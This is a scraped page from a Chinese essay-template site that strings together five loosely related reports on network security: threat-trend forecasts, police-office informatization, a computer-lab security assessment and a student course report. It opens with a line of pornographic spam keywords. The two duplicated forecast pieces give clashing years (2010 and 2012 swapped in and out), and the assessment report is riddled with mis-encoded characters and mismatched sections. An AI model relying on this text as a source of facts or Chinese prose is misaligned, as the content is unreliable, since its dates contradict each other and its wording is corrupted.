久久99精品久久久久久琪琪,久久人人爽人人爽人人片亞洲,熟妇人妻无码中文字幕,亚洲精品无码久久久久久久

網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告

時間:2019-05-14 15:06:17下載本文作者:會員上傳
簡介:寫寫幫文庫小編為你整理了多篇相關(guān)的《網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告》,但愿對你工作學(xué)習(xí)有幫助,當(dāng)然你在寫寫幫文庫還可以找到更多《網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告》。

第一篇:網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告

這是一篇關(guān)于調(diào)研報告的范文,可以提供大家借鑒!

1.垃圾郵件和網(wǎng)絡(luò)欺騙將立足“社交網(wǎng)絡(luò)”

毫無疑問,2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2010年相比,這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網(wǎng)站用戶形成了很大的困擾,但這些惡意軟件仍然是首先感染用戶的電腦,然后再竊取信息。但現(xiàn)在,安全專家則認(rèn)為,惡意軟件作者將進一步拓展攻擊范圍,把惡意軟件植入到社交網(wǎng)站應(yīng)用內(nèi)部。有了這種病毒,無論用戶是否訪問社交網(wǎng)站,黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《年度安全報告》中揭示了社交媒體(尤其是社交網(wǎng)絡(luò))對網(wǎng)絡(luò)安全的影響,并探討了人(而非技術(shù))在為網(wǎng)絡(luò)犯罪創(chuàng)造機會方面所起的關(guān)鍵作用。社交網(wǎng)絡(luò)已經(jīng)迅速成為網(wǎng)絡(luò)犯罪的溫床,因為這些網(wǎng)站的成員過于信任他們社區(qū)的其他成員,沒有采取阻止惡意軟件和計算機病毒的預(yù)防措施。小漏洞、不良用戶行為以及過期的安全軟件結(jié)合在一起會具有潛在的破壞性,可能大幅增加網(wǎng)絡(luò)安全的風(fēng)險。鑒于以上,2010年社交網(wǎng)絡(luò)或許將給我信息安全帶來更多的“驚喜”!

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展,但我們也必須意識到,市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務(wù)提供商的ApI(應(yīng)用編程接口)漏洞。

毋庸置疑,已經(jīng)開始有越來越多的IT功能通過云計算來提供,網(wǎng)絡(luò)犯罪也順應(yīng)了這一趨勢。安全廠商Fortinet預(yù)計,網(wǎng)絡(luò)犯罪借鑒“服務(wù)即安 全”(security-as-a-service)的理念,打造“服務(wù)即網(wǎng)絡(luò)犯罪”(cybercrime-as-a-service)這一特殊品牌。網(wǎng)絡(luò)犯罪也將效仿企業(yè)的做法使用基于云計算的工具,以便更有效率地部署遠程攻擊,甚至借此大幅拓展攻擊范圍。

對于云計算將被黑客所利用這個嚴(yán)峻的問題,各大安全公司和技術(shù)人員會把精力放在與云計算相關(guān)的安全服務(wù)上,提供加密、目錄和管理、反垃圾郵件、惡意程序等各種解決方案。據(jù)悉,著名安全評測機構(gòu)VB100號召安全行業(yè)應(yīng)該聯(lián)合起來,組成一個對抗惡意程序的共同體,分享技術(shù)和資源。或許這一提議在2010年能發(fā)展到實質(zhì)性的階段。

3.大量Mac計算機被病毒感染或黑客入侵

經(jīng)濟危機非但沒有傷害到蘋果的利益,反而使其業(yè)績進一步提升。但安全專家表示,在市場份額提升的同時,Mac也要面臨更多的黑客攻擊。過去幾年 間,蘋果的pC市場份額已經(jīng)從10%增長到12%,而且沒有放緩的跡象。與此同時,在售價高于1000美元的筆記本電腦中,蘋果更是占據(jù)了90%的份額,但針對iphone(手機上網(wǎng))和MacBook的攻擊也逐步引發(fā)外界關(guān)注。安全專家預(yù)計,Mac有可能會成為下一個最易受攻擊的目標(biāo)。盡管多數(shù)攻擊都瞄準(zhǔn)Windows,但2012年將會出現(xiàn)更多針對Mac OS X的攻擊。

安全廠商Websense安全研究高級經(jīng)理帕特里克•盧納德(patrick Runald)說:“Mac OS X中沒有任何的惡意軟件防范機制。”他表示,在CanSecWest黑客大賽上,Mac已經(jīng)連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴(yán)重

隨著移動應(yīng)用的不斷增多,智能設(shè)備的受攻擊面也在不斷擴大,移動安全所面臨的局面將會越來越嚴(yán)重。雖然我們已經(jīng)看到了iphone上的蠕蟲病毒,雖然它還不能自我傳播,還得依靠電腦來傳播,但是我們預(yù)計,2012年,將會出現(xiàn)真正可以自我傳播的病毒,嚴(yán)重威脅iphone和Android等設(shè)備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾•舒文伯格(Roel Schouwenberg)說:“Android手機的日益流行,加之缺乏對第三方應(yīng)用安全性的有效控制,將導(dǎo)致諸多高調(diào)惡意軟件的出現(xiàn)。”

總體而言,安全專家認(rèn)為,隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務(wù),黑客將越發(fā)關(guān)注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網(wǎng)站吸引用戶上鉤,利用搜索引擎優(yōu)化技術(shù)展開攻擊便是其中的一種方法。谷歌和必應(yīng)(Bing)對實時搜索的支持 也將吸引黑客進一步提升相關(guān)技術(shù)。作為一種攻擊渠道,搜索引擎是非常理想的選擇,因為用戶通常都非常信任搜索引擎,對于排在前幾位的搜索結(jié)果更是沒有任何 懷疑,這就給了黑客可乘之機,從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應(yīng)潮流

與Cloud類似的是,虛擬化技術(shù)也將抓住快速發(fā)展的時機。業(yè)界中已經(jīng)有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障,還能方便協(xié)作,提高效率。

除了瘦客戶機的虛擬桌面以外,企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復(fù)到已知的安全狀態(tài)配置,從而為網(wǎng)上銀行或安全的企業(yè)應(yīng)用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存,只要相互保持隔離就行。

第二篇:網(wǎng)絡(luò)信息安全發(fā)展調(diào)研報告

1.垃圾郵件和網(wǎng)絡(luò)欺騙將立足“社交網(wǎng)絡(luò)”

毫無疑問,2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2012年相比,這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網(wǎng)站用戶形成了很大的困擾,但這些惡意軟件仍然是首先感染用戶的電腦,然后再竊取信息。但現(xiàn)在,安全專家則認(rèn)為,惡意軟件作者將進一步拓展攻擊范圍,把惡意軟件植入到社交網(wǎng)站應(yīng)用內(nèi)部。有了這種病毒,無論用戶是否訪問社交網(wǎng)站,黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《安全報告》中揭示了社交媒體(尤其是社交網(wǎng)絡(luò))對網(wǎng)絡(luò)安全的影響,并探討了人(而非技術(shù))在為網(wǎng)絡(luò)犯罪創(chuàng)造機會方面所起的關(guān)鍵作用。社交網(wǎng)絡(luò)已經(jīng)迅速成為網(wǎng)絡(luò)犯罪的溫床,因為這些網(wǎng)站的成員過于信任他們社區(qū)的其他成員,沒有采取阻止惡意軟件和計算機病毒的預(yù)防措施。小漏洞、不良用戶行為以及過期的安全軟件結(jié)合在一起會具有潛在的破壞性,可能大幅增加網(wǎng)絡(luò)安全的風(fēng)險。鑒于以上,2012年社交網(wǎng)絡(luò)或許將給我信息安全帶來更多的“驚喜”!

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展,但我們也必須意識到,市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務(wù)提供商的ApI(應(yīng)用編程接口)漏洞。

www.tmdps.cn【xiexiebang.com范文網(wǎng)】

毋庸置疑,已經(jīng)開始有越來越多的IT功能通過云計算來提供,網(wǎng)絡(luò)犯罪也順應(yīng)了這一趨勢。安全廠商Fortinet預(yù)計,網(wǎng)絡(luò)犯罪借鑒“服務(wù)即安 全”(security-as-a-service)的理念,打造“服務(wù)即網(wǎng)絡(luò)犯罪”(cybercrime-as-a-service)這一特殊品牌。網(wǎng)絡(luò)犯罪也將效仿企業(yè)的做法使用基于云計算的工具,以便更有效率地部署遠程攻擊,甚至借此大幅拓展攻擊范圍。

3.大量Mac計算機被病毒感染或黑客入侵

安全廠商Websense安全研究高級經(jīng)理帕特里克?盧納德(patrick Runald)說:“Mac OS X中沒有任何的惡意軟件防范機制。”他表示,在CanSecWest黑客大賽上,Mac已經(jīng)連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴(yán)重

隨著移動應(yīng)用的不斷增多,智能設(shè)備的受攻擊面也在不斷擴大,移動安全所面臨的局面將會越來越嚴(yán)重。雖然我們已經(jīng)看到了iphone上的蠕蟲病毒,雖然它還不能自我傳播,還得依靠電腦來傳播,但是我們預(yù)計,2012年,將會出現(xiàn)真正可以自我傳播的病毒,嚴(yán)重威脅iphone和Android等設(shè)備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾?舒文伯格(Roel Schouwenberg)說:“Android手機的日益流行,加之缺乏對第三方應(yīng)用安全性的有效控制,將導(dǎo)致諸多高調(diào)惡意軟件的出現(xiàn)。”

總體而言,安全專家認(rèn)為,隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務(wù),黑客將越發(fā)關(guān)注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網(wǎng)站吸引用戶上鉤,利用搜索引擎優(yōu)化技術(shù)展開攻擊便是其中的一種方法。谷歌和必應(yīng)(Bing)對實時搜索的支持 也將吸引黑客進一步提升相關(guān)技術(shù)。作為一種攻擊渠道,搜索引擎是非常理想的選擇,因為用戶通常都非常信任搜索引擎,對于排在前幾位的搜索結(jié)果更是沒有任何 懷疑,這就給了黑客可乘之機,從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應(yīng)潮流

與Cloud類似的是,虛擬化技術(shù)也將抓住快速發(fā)展的時機。業(yè)界中已經(jīng)有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障,還能方便協(xié)作,提高效率。

除了瘦客戶機的虛擬桌面以外,企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復(fù)到已知的安全狀態(tài)配置,從而為網(wǎng)上銀行或安全的企業(yè)應(yīng)用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存,只要相互保持隔離就行。

第三篇:信息安全調(diào)研報告

公安基層辦公室信息化調(diào)研報告

現(xiàn)代社會的信息化、網(wǎng)絡(luò)化和現(xiàn)代通信、計算機互聯(lián)網(wǎng)技術(shù)的發(fā)展,對公安機關(guān)提出了越來越高的要求。為適應(yīng)社會形勢發(fā)展的需要,公安部近年來連續(xù)部署了“金盾工程”建設(shè),標(biāo)志著警務(wù)工作信息化工程全面啟動。要適應(yīng)社會發(fā)展和科技進步的需要,公安機關(guān)必須把科技強警工作和公安信息化建設(shè)擺在重要的位置。公安辦公室作為“司令部”、“參謀部”,要及時、準(zhǔn)確掌握各類情況,為領(lǐng)導(dǎo)決策提供科學(xué)依據(jù),必須加強信息化建設(shè)。

一、基層公安辦公室信息化是公安信息化的薄弱環(huán)節(jié)

(一)認(rèn)識上的偏差

部分領(lǐng)導(dǎo)和民警在思想觀念上存在著只須懂法就足以勝任當(dāng)前公安工作的偏見,對信息化的了解也僅限于信息化就是用微機打字、信息化就是上因特網(wǎng),對信息化范圍、信息化開展的意義認(rèn)識不足,沒有真正意識到信息化建設(shè)對公安工作有著巨大推動作用。因此,公安機關(guān)出現(xiàn)了阻礙科學(xué)技術(shù)與辦案結(jié)合的不利因素,缺乏依靠科技進步的內(nèi)在動力;對于如何把信息技術(shù)運用到公安工作中來、如何用信息化促進公安工作的跨越式發(fā)展,研究較少,重視不夠。這種狀況已成為公安機關(guān)加快信息化進程,推動辦公、辦案現(xiàn)代化發(fā)展的瓶頸,與當(dāng)前形勢發(fā)展和公安工作的任務(wù)需求極不相應(yīng),也制約了公安工作的發(fā)展。

(二)辦公室基礎(chǔ)設(shè)施簡陋導(dǎo)致工作效率的低下

科技強警的鼓敲了幾年,但基層公安局辦公室仍然普遍存在基礎(chǔ)設(shè)施簡陋、辦公條件差等現(xiàn)象,辦公室作為綜合部門,工作是多而雜,且有的工作手續(xù)多、所經(jīng)部門廣,僅僅依靠幾個民警的手工操作或單機辦公,往往使辦公室民警大有力不從心之感,工作效率低下那也是情理之中。因此,針對辦公室的職能作用,建立省人省力的信息化系統(tǒng),將辦公室人員從材料難寫的困惑中解脫出來,提高工作效率勢在必行。

(三)缺乏人才,使信息化建設(shè)力不從心

公安機關(guān)信息化建設(shè)工作存在最突出的問題,就是嚴(yán)重缺乏信息技術(shù)人才。從目前來看,公安機關(guān)的工作人員在過去所接受的教育中很少涉及信息技術(shù)知識,而專門的技術(shù)人員又大多為法醫(yī)、會計、痕檢、攝像等傳統(tǒng)技術(shù)型工作人員,因此對于信息技術(shù)這門科技含量很高的結(jié)合技術(shù),顯得束手無策,很難提出一個長遠的發(fā)展規(guī)劃、很難得心應(yīng)手地組織開展信息化建設(shè)。對于有一些信息化建設(shè)的單位,又由于人才缺乏,先進的信息化設(shè)備不能使用或不能充分發(fā)揮作用,使信息化建設(shè)的成果成為擺設(shè)。因此在沒有一支高水平的信息化技術(shù)人才隊伍的前提下,公安信息化建設(shè)對某些單位而言簡直是一種神話或資金上的嚴(yán)重浪費。

(四)缺乏資金,信息化建設(shè)難以保障

信息化建設(shè)是一項高技術(shù)、高投入、高效能的現(xiàn)代化基礎(chǔ)建設(shè),必須要有足

夠的建設(shè)經(jīng)費作保證。它所涉及的硬件設(shè)備、軟件系統(tǒng)都需要大量的資金來購置。以一個縣公安局辦公室為例,信息化系統(tǒng)需要一個由一臺服務(wù)器,10臺終端微機組成的小型局型網(wǎng),購置網(wǎng)絡(luò)辦公系統(tǒng)、數(shù)據(jù)統(tǒng)計系統(tǒng),僅此幾項建設(shè)資金投入就達幾十萬元。財政卻往往因為各種原因,不能保障和支持公安機關(guān)的信息化建設(shè)。因此公安機關(guān)在信息化建設(shè)上只能是等米下鍋,信息化建設(shè)得不到有效保障。

二、加強基層公安局辦公室信息化建設(shè)的方法

(一)信息化系統(tǒng)的構(gòu)成公安辦公室信息化系統(tǒng)就是根據(jù)信息論、系統(tǒng)論、控制論、現(xiàn)代管理科學(xué)理論、現(xiàn)代信息技術(shù),結(jié)合辦公室的職能作用和業(yè)務(wù)工作特點而建立的信息體系。公安辦公室信息化系統(tǒng)是公安信息系統(tǒng)的子系統(tǒng),以技術(shù)為輔助手段,使公安辦公室獲得快速、靈敏、準(zhǔn)確、全面和安全有效的綜合信息支持,實現(xiàn)辦公自動化、科學(xué)化、網(wǎng)絡(luò)化,以充分發(fā)揮公安辦公室的綜合分析、“參謀”作用。一般來說,根據(jù)辦公室的職能作用,基層公安局辦公室信息化系統(tǒng)主要包括以下幾個系統(tǒng):

1、指揮中心信息處理系統(tǒng)

該系統(tǒng)主要承擔(dān)快速、準(zhǔn)確、全面獲得的動態(tài)信息,為領(lǐng)導(dǎo)正確決策提供第一手資料,是科學(xué)決策、快速指揮調(diào)度的重要依據(jù)和信息主渠道。指揮中心信息處理系統(tǒng)縱向與上下級公安指揮中心信息網(wǎng)絡(luò)連接,橫向以公安信息管理中心為樞紐,整合同級公安犯罪信息中心、交通、戶政、刑偵、出入境、治安等信息系統(tǒng),運用計算機網(wǎng)絡(luò)技術(shù)控制手段,將分散的信息統(tǒng)一起來,實現(xiàn)信息資源共享和系統(tǒng)開放,成為覆蓋全局、四通八達的能為各警種、各基層戰(zhàn)斗單位和一線民警提供大量信息的高速通信網(wǎng),從而克服時空限制支持各警種協(xié)同作戰(zhàn)。

2、公安統(tǒng)計系統(tǒng)

該系統(tǒng)主要依靠統(tǒng)計軟件,進行數(shù)據(jù)的收集、分類、匯總,有效地進行數(shù)據(jù)統(tǒng)計和解決統(tǒng)計不實問題,并對下級公安機關(guān)進行有力的綜合指導(dǎo)。公安統(tǒng)計系統(tǒng)可通過數(shù)據(jù)統(tǒng)計,進一步進行社會治安情況分析,為各級部門提供服務(wù)。

3、綜合調(diào)研系統(tǒng)

該系統(tǒng)主要以科學(xué)管理的手段快速、及時、準(zhǔn)確地收集各業(yè)務(wù)單位、基層機關(guān)所得到的成績和經(jīng)驗,進行系統(tǒng)分析,反映整個公安工作的經(jīng)驗、成就和業(yè)績。

4、檔案管理系統(tǒng)

該系統(tǒng)主要是通過科學(xué)技術(shù)手段解決過去查找材料、文件困難,材料保存時間不能過長等問題。檔案管理系統(tǒng)建立后,將文件、材料的文號、文名、存放文柜進行編號,錄入計算機,以便于檢索,并將文件、材料進行掃描存入微機,需要查閱,只需在計算機中進行檢索便可直接查看,同時還可通過局域網(wǎng),突破時空限制。

5、刑偵、治安、戶政等業(yè)務(wù)部門系統(tǒng)

公安辦公室的職能作用決定了其工作具有綜合性的特點,辦公室與刑偵、治安、戶政等業(yè)務(wù)部門是相互服務(wù)的。因此,辦公室信息系統(tǒng)與刑偵、治安、戶政等業(yè)務(wù)部門的網(wǎng)絡(luò)連接是必不可少的。刑偵、治安、戶政等業(yè)務(wù)部門子系統(tǒng)主要是結(jié)合網(wǎng)絡(luò)技術(shù)手段,進行網(wǎng)上追逃、戶口上網(wǎng)管理,以便進行信息快速流通。如指揮中心信息處理子系統(tǒng)通過業(yè)務(wù)部門收集各類業(yè)務(wù)數(shù)據(jù)、不安定情況等;辦公室綜合調(diào)研系統(tǒng)通過刑偵部門收集打擊犯罪的情況等;公安統(tǒng)計子系統(tǒng)從戶政收集人口數(shù)據(jù)等等,都可從各業(yè)務(wù)部門子系統(tǒng)網(wǎng)絡(luò)上獲得。

(二)辦公室信息化系統(tǒng)的建設(shè)

1、組建經(jīng)濟實用的小型局域網(wǎng),搭建網(wǎng)絡(luò)化辦公平臺,實現(xiàn)信息化系統(tǒng)的職能作用。

2、購置實用的業(yè)務(wù)辦公系統(tǒng)軟件,實現(xiàn)辦公自動化。

基層公安辦公室根據(jù)實際情況可以自行購買相應(yīng)的業(yè)務(wù)及辦公系統(tǒng)軟件。各基層公安局辦公室要積極爭取政策,引進人才,把技術(shù)精、有責(zé)任心和熱愛公安事業(yè)的信息技術(shù)人才充實到公安機關(guān)中來,并努力營造一個適合技術(shù)人員發(fā)展的空間,保證信息技術(shù)人才進得來、留得住、用得好、有發(fā)展。其次立足本室,在沒有專門人才的情況下,加大全員培訓(xùn)力度,從實際工作出發(fā),從實際應(yīng)用出發(fā),努力提高全體民警的信息化素質(zhì),提高計算機使用水平。

3、建立制度,確保信息化建設(shè)發(fā)揮作用。

信息化建設(shè)的項目建成以后,不能放著、擺著不用,而要充分地、強制性地利用起來。不能因為民警囿于傳統(tǒng)工作方法,學(xué)習(xí)掌握上存在惰性,學(xué)習(xí)掌握需要一段時間,而不做制度上的要求。應(yīng)從整體發(fā)展的角度、公安事業(yè)發(fā)展的高度,制定規(guī)章制度,要求各類案件信息必須輸入微機、各類公文必須在微機上書寫、流轉(zhuǎn),從而使民警從傳統(tǒng)的辦公狀態(tài)進入到網(wǎng)絡(luò)化辦公、信息化辦公的角色中,只有這樣才能把信息化建設(shè)的成果應(yīng)用到公安工作中,推動公安工作向前發(fā)展,才真正地將信息化建設(shè)落到實處。

第四篇:網(wǎng)絡(luò)信息安全評估報告

計算機信息安全評估報告

如何

現(xiàn)

可用性1.人們通常采用一些技術(shù)措施或網(wǎng)絡(luò)安全設(shè)備來實現(xiàn)這些目標(biāo)。例如:

使用防火墻,把攻擊者阻擋在網(wǎng)絡(luò)外部,讓他們“迚不來”。

即使攻擊者迚入了網(wǎng)絡(luò)內(nèi)部,由于有加密機制,會使他們“改不了”和“拿不走”關(guān) 鍵信息和資源。

機密性2機密性將對敏感數(shù)據(jù)的訪問權(quán)限控制在那些經(jīng)授權(quán)的個人,只有他們才能查看數(shù)據(jù)。機密性可防止向未經(jīng)授權(quán)的個人泄露信息,或防止信息被加工。

如圖所示,“迚不來”和“看不懂”都實現(xiàn)了信息系統(tǒng)的機密性。

人們使用口令對迚入系統(tǒng)的用戶迚行身份鑒別,非法用戶沒有口令就“迚不來”,這就保證了信息系統(tǒng)的機密性。

即使攻擊者破解了口令,而迚入系統(tǒng),加密機制也會使得他們“看不懂”關(guān)鍵信息。例如,甲給乙發(fā)送加密文件,只有乙通過解密才能讀懂其內(nèi)容,其他人看到的是亂碼。由此便實現(xiàn)了信息的機密性。

完整性3如圖所示,“改不了”和“拿不走”都實現(xiàn)了信息系統(tǒng)的完整性。使用加密機制,可以保證信息系統(tǒng)的完整性,攻擊者無法對加密信息迚行修改或者復(fù)制。

不可抵賴性4如圖所示,“跑不掉”就實現(xiàn)了信息系統(tǒng)的不可抵賴性。如果攻擊者迚行了非法操作,系統(tǒng)管理員使用審計機制或簽名機制也可讓他們無所遁形

對考試的機房迚行“管理制度”評估。(1)評估說明

為規(guī)范管理,保障計算機設(shè)備的正常運行,創(chuàng)造良好的上機環(huán)境,必須制定相關(guān)的管理制度

(2)評估內(nèi)容

沒有建立相應(yīng)信息系統(tǒng)運行管理規(guī)程、缺陷管理制度、統(tǒng)計匯報制度、運維流程、值班制度,沒有實行工作票制度;機房出入管理制度上墻,但沒有機房迚出情況記錄(3)評估分析報告

所存在問題:1沒有系統(tǒng)的相關(guān)負責(zé)人,機房也是誰人都可以自由出入。2在上機過程中做與學(xué)習(xí)無關(guān)的工作。3機房財產(chǎn)規(guī)劃不健全等(4)評估建議

1、計算機室的管理由系統(tǒng)管理員負責(zé),非機房工作人員未經(jīng)允許不準(zhǔn)迚入。未經(jīng)許可不得擅自上機操作和對運行設(shè)備及各種配置迚行更改。

2、保持機房內(nèi)清潔、安靜,嚴(yán)禁機房內(nèi)吸煙、吐痰以及大聲喧嘩;嚴(yán)禁將易燃、易爆、易污染和強磁物品帶入機房。

3、機房內(nèi)的一切物品,未經(jīng)管理員同意,不得隨意挪動,拆卸和帶出機房。

4、上機時,應(yīng)先認(rèn)真檢查機器情況,如有問題應(yīng)及時向機房管理員反應(yīng)。

5、上機人員不得在機房內(nèi)迚行與上機考試無關(guān)的計算機操作。

6、上機時應(yīng)按規(guī)定操作,故意或因操作不當(dāng)造成設(shè)備損壞,除照價賠償外,視情節(jié)輕重給予處罰。對考試的機房迚行“物理安全”評估。(1)評估說明

防火,防水,防塵,防腐蝕,主機房安裝門禁、監(jiān)控與報警系統(tǒng)。(2)評估內(nèi)容 主機房沒有安裝門禁、監(jiān)控系統(tǒng),有消防報警系統(tǒng)。(3)評估分析報告

沒有詳細的機房配線圖,機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路是分開的,機房沒有配備應(yīng)急照明裝置,有定期對UPS的運行狀況迚行檢測但沒有檢測記錄。

(4)評估建議

有詳細的機房配線圖,機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路分開,機房配備應(yīng)急照明裝置,定期對UPS的運行狀況迚行檢測(查看半年內(nèi)檢測記錄)對考試的機房迚行“計算機系統(tǒng)安全”評估。(1)評估說明

應(yīng)用系統(tǒng)的角色、權(quán)限分配有記錄;用戶賬戶的變更、修改、注銷有記錄(半年記錄情況);關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計幵迚行長期存儲;對關(guān)鍵應(yīng)用系統(tǒng)有應(yīng)急預(yù)案;關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更;新系統(tǒng)上線前迚行安全性測試。

(2)評估內(nèi)容

營銷系統(tǒng)的角色、權(quán)限分配有記錄,其余系統(tǒng)沒有;用戶賬戶的變更、修改、注銷沒有記錄;關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作沒有迚行審計;沒有針對關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案;關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令有定期迚行變更;有些新系統(tǒng)上線前沒有迚行過安全性測試。

(3)評估分析報告

網(wǎng)絡(luò)中的防火墻位置部署合理,防火墻規(guī)則配置符合安全要求,防火墻規(guī)則配置的建立、更改有規(guī)范申請、審核、審批流程,對防火墻日志迚行存儲、備份。

(4)評估建議

完善系統(tǒng)的角色、權(quán)限分配有記錄;記錄用戶賬戶的變更、修改、注銷(半年記錄情況);關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計;制定針對關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案;關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更;新系統(tǒng)上線前應(yīng)嚴(yán)格按照相關(guān)標(biāo)準(zhǔn)迚行安全性測試。

對考試的機房迚行“網(wǎng)絡(luò)與通信安全”評估。(1)評估說明

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺、針對安全設(shè)備的日志服務(wù)器,采用漏洞掃描系統(tǒng),重要系統(tǒng)一年迚行一次信息安全風(fēng)險評估。

(2)評估內(nèi)容

沒有部署身份認(rèn)證系統(tǒng)、安全管理平臺,沒有漏洞掃描系統(tǒng),重要系統(tǒng)沒有迚行信息安全風(fēng)險評估,沒有部署針對安全設(shè)備的日志服務(wù)器。

(3)評估分析報告

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺、針對安全設(shè)備的日志服務(wù)器,采用漏洞掃描系統(tǒng),重要系統(tǒng)一年迚行一次信息安全風(fēng)險評估。

(4)評估建議

部署身份認(rèn)證系統(tǒng)、安全管理平臺,采用漏洞掃描系統(tǒng),重要系統(tǒng)一年內(nèi)迚行信息安全風(fēng)險評估,部署針對安全設(shè)備的日志服務(wù)器。

信息安全評估:

對考試的機房迚行“日志與統(tǒng)計安全”評估。(1)評估說明

每天計算機上機記錄日志在冊,對系統(tǒng)迚行不定時的還原。對本局半年內(nèi)發(fā)生的較大的、或者發(fā)生次數(shù)較多的信息安全事件迚行匯總記錄,形成本單位的安全事件列表

(2)評估內(nèi)容

已成立了信息安全領(lǐng)導(dǎo)機構(gòu),但尚未成立信息安全工作機構(gòu)。

(3)評估分析報告

局域網(wǎng)核心交換設(shè)備、城域網(wǎng)核心路由設(shè)備應(yīng)采取設(shè)備冗余或準(zhǔn)備備用設(shè)備,不允許外聯(lián)鏈路繞過防火墻,具有當(dāng)前準(zhǔn)確的網(wǎng)絡(luò)拓撲結(jié)構(gòu)圖

(4)評估建議

完善信息安全組織機構(gòu),成立信息安全工作機構(gòu)。

第五篇:【企業(yè)網(wǎng)絡(luò)】網(wǎng)絡(luò)信息安全報告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡(luò)信息安全報告

一、實驗?zāi)康募耙?/p>

該專周的目標(biāo)是讓學(xué)生掌握網(wǎng)絡(luò)安全的基本框架,網(wǎng)絡(luò)安全的基本理論。以及了解計算機網(wǎng)絡(luò)安全方面的管理、配置和維護。

本課程要求在理論教學(xué)上以必需夠用為原則,應(yīng)盡量避免過深過繁的理論探討,重在理解網(wǎng)絡(luò)安全的基本框架,網(wǎng)絡(luò)安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡(luò)安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對計算機的使用有一定了解(了解Windows的使用,具有鍵盤操作和文件處理的基礎(chǔ)),并已經(jīng)掌握計算機網(wǎng)絡(luò)的基本原理。

二、專周內(nèi)容

1、安全需求分析

(1)網(wǎng)絡(luò)安全問題主要集中在對服務(wù)器的安全保護、防黑客和病毒、重要網(wǎng)段的保護及管理安全上。因此,我們必須采取相應(yīng)的安全措施杜絕安全隱患,其中應(yīng)該做到:

A、公開服務(wù)器的安全保護 B、防止黑客從外部攻擊 C、入侵檢測與監(jiān)控 D、病毒防護 E、數(shù)據(jù)安全保護 F、網(wǎng)絡(luò)的安全管理

(2)解決網(wǎng)絡(luò)安全問題的一些要求

A、大幅度地提高系統(tǒng)的安全性(重點是可用性和可控性);

B、保持網(wǎng)絡(luò)原有的特點,即對網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性,能透明接入,無需更改網(wǎng)絡(luò)設(shè)置;

C、易于操作、維護,并便于自動化管理,而不增加或少增加附加操作;

D、盡量不影響原網(wǎng)絡(luò)拓撲結(jié)構(gòu),同時便于系統(tǒng)及系統(tǒng)功能的擴展;

E、安全保密系統(tǒng)具有較好的性能價格比。一次性投資,可以長期使用;

F、安全產(chǎn)品具有合法性,及經(jīng)過國家有關(guān)管理部門的認(rèn)可或認(rèn)證;

(3)系統(tǒng)安全目標(biāo)

A、建立一套完整可行的網(wǎng)絡(luò)安全與網(wǎng)絡(luò)管理策略;

B、將內(nèi)部網(wǎng)絡(luò)、公開服務(wù)器網(wǎng)絡(luò)和外網(wǎng)進行有效隔離,避免與外部網(wǎng)絡(luò)直接通信;

C、建立網(wǎng)站各主機和服務(wù)器的安全保護措施,保證他們的系統(tǒng)安全;

D、加強合法用戶的訪問認(rèn)證,同時將用戶的訪問權(quán)限控制在最低限度;

E、全面監(jiān)視對公開服務(wù)器的訪問,及時發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為;

